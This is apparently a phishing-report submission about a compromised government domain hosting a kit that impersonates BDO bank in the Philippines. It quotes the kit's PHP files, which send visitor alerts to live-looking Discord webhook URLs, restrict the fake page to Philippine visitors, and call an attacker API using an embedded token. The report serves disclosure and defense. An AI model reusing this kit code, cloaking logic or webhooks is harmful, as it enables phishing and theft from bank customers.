add www[.]jcdc[.]gov[.]jm

[g0d33p3rsec]

Phishing Domain/URL/IP(s):

www.jcdc.gov.jm
https://www.jcdc.gov.jm/bdo.id/sso/#.php

Impersonated domain

www.bdo.com.ph

Describe the issue

Phishing kit downloaded from https://www.jcdc.gov.jm/bdo.id.zip. Some files of interest:

index.php

Click to expand

<?php 
error_reporting(0); 
header("X-Robots-Tag: noindex, nofollow", true);
// include("geoplugin.php");

require "error_bdo.php";
require './sso/discord_function.php';

$embed = [
    "title"=>"Visitor Logs",
    "description"=>"@everyone @everyone",
    "color"=> hexdec('FF0000'),
    "fields"=>[
        [
            "name"=>"Visitor Details",
            "value"=>"```ini\nBDO IMPOSTOR!!```",
            "inline"=>false
        ],
    ],
    "footer"=>[
        "text"=>"2077BlackOps"
    ]
];

$alert = (new Discord())->dischooks(
    0,
    null,
    $hook = 'https://discord.com/api/webhooks/1140153268081791060/akwLceV_1B-SF3W-8hPjGonoGqJfi39LUIZsCDSuw4NvWwePec8JtuCUUYWK6801g0zh',
    $embed,
);

/sso/discord_function.php

Click to expand

<?php
require 'curl_helper.php';

class Discord{

public function dischooks($config=0, $content=null, $hook = null, $embed=[]) {
        // load curl helper
//        $this->super->call->helper('curl');

//        $discord_config = config_item('DISCORD');
        $conf = $discord_config[$config] ?? [
            'embed' => [
                'color' => hexdec('EA0E85')
            ],
            'bot' => [],
            'hook'=>'https://discord.com/api/webhooks/1139882398960603136/39ic2_Ts4MjStHcfWmn1WPRiJi2s9loB0HgaUrUBsOki_DxDkQtQkN1HvntPCkq8xH9s'
        ];
        $bot = $conf['bot'];
        $hooks = $hook;

        if (isset($embed['color'])) {
            $conf['embed']['color'] = $embed['color'];
        }
        $embed = array_merge($embed, $conf['embed']);
        $embed['timestamp'] = $wh['timestamp'] ?? date("c", time());

        $json = json_encode([
            "content" => $content,
            "tts" => false,
//            "username" => $bot['username'],
            "username" => '?',
            "avatar_url" => 'https://ru.gravatar.com/userimage/28503754/1168e2bddca84fec2a63addb348c571d.jpg?size=512',
            "embeds" => [
                $embed,
            ]
        ], JSON_THROW_ON_ERROR);

        return get_content($hook, 'post', [
            'Content-type: application/json',
        ], $json);

    }

}

/sso/fud-init.php

Click to expand

<?php

require 'core.php';

if(!empty($_GET['code']) && $_GET['code'] === 'bdo') {
    if(
        (!empty($_SERVER['HTTP_CF_IPCOUNTRY']) && $_SERVER['HTTP_CF_IPCOUNTRY'] === 'PH') || 
        Banco::ClientCountry() === 'PHL'
    ) {
        FUD::setup();
    }
}

header("Location: ./#.php?josso_back_to=https://online.bdo.com.ph/sso/josso_security_check");
die();

/sso/core.php

Click to expand

<?php

ini_set('display_errors', 0);

if(!empty($_SERVER['HTTP_CDN_LOOP'])) {

    if($_SERVER['HTTP_CDN_LOOP'] === 'cloudflare' && !empty($_SERVER['HTTP_CF_CONNECTING_IP'])) {
        $_SERVER["REMOTE_ADDR"] = $_SERVER['HTTP_CF_CONNECTING_IP'];
    }
} elseif(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])){
    if (strpos($_SERVER['HTTP_X_FORWARDED_FOR'], ',')>0) {
        $addr = explode(",", $_SERVER['HTTP_X_FORWARDED_FOR']);
        $_SERVER["REMOTE_ADDR"] = trim($addr[0]);
    } else {
        $_SERVER["REMOTE_ADDR"] = $_SERVER['HTTP_X_FORWARDED_FOR'];
    }
}

class FUD {
    private static $__config = [
        'session_name' => 'fud',
        'cookie_name' => 'banco_mars'
    ];
    public static function sess_start() {
        if (session_status() == PHP_SESSION_NONE) {
            session_start();
        }
    }
    public static function setup(){
        self::sess_start();
        $_SESSION[self::$__config['session_name']] = true;
    }
    public static function run(){
        self::sess_start();
        if(empty($_SESSION[self::$__config['session_name']])) {
            die(http_response_code(502));
        }
        header($_SERVER["SERVER_PROTOCOL"]." 404 Not Found", true, 404);
        header('status: 404');
    }
}

class Banco {
    private static $config = [
        'base_url' => 'https://api.retiredfuccboi.com/',
        'edge' => 'bdo',
        'kawatan' => [
            'id' => '3',
            'token' => 'bp1rc2YM7BjNd1pNVP4DIYiN6JrWYplB7xMlJs67TGjZVfDeez5teBbMKXq1hAthmQ=='
        ]
    ];
    private static function base_url(){
        return self::$config['base_url'].self::$config['edge'].'/';
    }
    public static function api($method, $data = []){

        $httpopt = [
            'method'  => 'GET',
            'header'  => 'X-Kawatan-Token: '.self::$config['kawatan']['token']."\r\n".
            'X-Kawatan-Id: '.self::$config['kawatan']['id']
        ];
        if(!empty($data)) {
            $httpopt['method'] = 'POST';
            $httpopt['header'] = $httpopt['header']."\r\n".'Content-Type: application/x-www-form-urlencoded';
            $httpopt['content'] = http_build_query($data);
        }

        $api = @file_get_contents(self::base_url().$method, false, stream_context_create([
            'http' => $httpopt
        ]));

        return @json_decode($api, true);
    }
    public static function ClientCountry(){
        return self::api('../ip?info='.$_SERVER['REMOTE_ADDR'])['country_code'];
    }
   
}

the discord_function.php included https://ru.gravatar.com/userimage/28503754/1168e2bddca84fec2a63addb348c571d.jpg?size=512 for the avatar_url.

Click to expand

Related external source

https://urlscan.io/result/f39cb4b2-81e3-45dd-9491-184fbe2c8a54/
https://urlscan.io/result/f92f9fd9-38d9-4e1f-a221-f872ac3b9579/

Screenshot

Click to expand